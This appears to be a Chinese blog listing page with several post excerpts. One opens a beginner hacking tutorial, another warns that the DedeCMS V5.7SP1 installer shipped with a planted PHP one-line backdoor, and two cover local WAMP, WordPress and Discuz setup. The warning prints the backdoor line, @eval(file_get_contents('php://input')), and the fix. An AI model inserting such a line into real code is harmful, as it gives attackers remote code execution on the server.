通过本文你将了解黑客常用的入手思路和技术手法,适合热爱网络信息安全的新手朋友了解学习。本文将从最开始的信息收集开始讲述黑客是如何一步步的攻破你的网站和服务器的.阅读本文你会学到以下内容:
1.渗透测试前的简单信息收集。
2.sqlmap的使用
3.nmap的使用
4.nc反弹提权
5.linux系统的权限提升
6.backtrack 5中渗透测试工具nikto和w3af的使用等.
假设黑客要入侵的你的网站域名为:hack-test.com
让我们用ping命令获取网站服务器的IP地址.
现在我们获取了网站服务器的IP地址为:173.236.138.113
寻找同一服务器上的其它网站,我们使用sameip.org.
26 sites hosted on IP Address 173.236.138.113 继续阅读
织梦内容管理系统一直以方便快捷强大而著称,但是这次..就连官网也受到影响…
最新消息,其实我是在微博上看到有人发布了这个消息。
织梦V5.7SP1版本安装包内被人植入了一句话木马。
我自己亲自去测试了一下,果真,被人植入了一句话木马。
所幸的事,我管理的两个网站并没有被植入(是因为之前早些日子被下载的原因吧!)
木马位置在uploads->include->shopcar.class.php文件中的第32行。
连官网都被日了- -最近下载了织梦并且传上服务器的朋友,要小心了。。
修复方案:删除@eval(file_get_contents(‘php://input’)),以及针对服务器进行全面的扫描杀毒。
上一篇文章给大家介绍Wamp环境的搭建,这次给大家介绍如何在本机搭建一个wordpress博客与discuz论坛。
搭建之前,要明白,wordpress与discuz都是内容管理系统,就是常说的CMS。虽然大家常说的是博客与论坛,但是这两套系统都需要一个东西:数据库。这个是必不可少的,少了数据库,就成不了系统了。
那么既然要数据库,我们就得创建一个数据库,在Wamp环境下,默认Mysql地址为:localhost/phpmyadmin(也可以输入127.0.0.1/phpmyadmin来访问,127.0.0.1是回环地址,访问主机的,这里就不再介绍了。)
访问之后就会出现以下界面:
这里我们可以创建一个Mysql数据库了,数据库名字自己定义,最好就是名字好记,但是不要太简单(出于安全考虑)。
我们搭建一个wordpress,就起名为wordpress好了。
这时,我们的数据库已经创建好了。我们下一步要做的就是从wordpress官方网站下载一个wordpress回来,放到我们Wamp安装目录下的3w目录(www目录即可)。 继续阅读
一直以来,很多朋友都想要搞一个属于自身的网站,网站语言脚本有许多(ASP/PHP/JSP)等等。
一直以来,相信很多朋友在没买空间、域名的情况下,也想自己在本机上搭建一个博客,又或者是论坛。
博客大多以wordpress为主,而论坛则以discuz/PHPwind为主。这些PHP搭建的站在Windows环境下配置可不是一件容易的事情。要折腾Apache,还有MySql。这些对于小白来说都是相当的不容易的。
今天给大家推荐的WampServer是一款集成了Apache+MySql+PHP的环境,就是常说Wamp(Windows+Apache+Mysql+PHP)
安装过程几乎非常的简单。
双击软件后,提示是否安装,选择是即可(英文界面,不懂英文的小菜也不用太害怕的。)
这里选择Next->进入安装的下一步。
这里是问协议的,还是Next(你不同意这协议就没法安装了,呵呵。)
进入下一步之后就是安装路径,你们可以自由选择你的安装路径,这里选择你的磁盘位置,可以是C盘也可以是D盘等等。 继续阅读
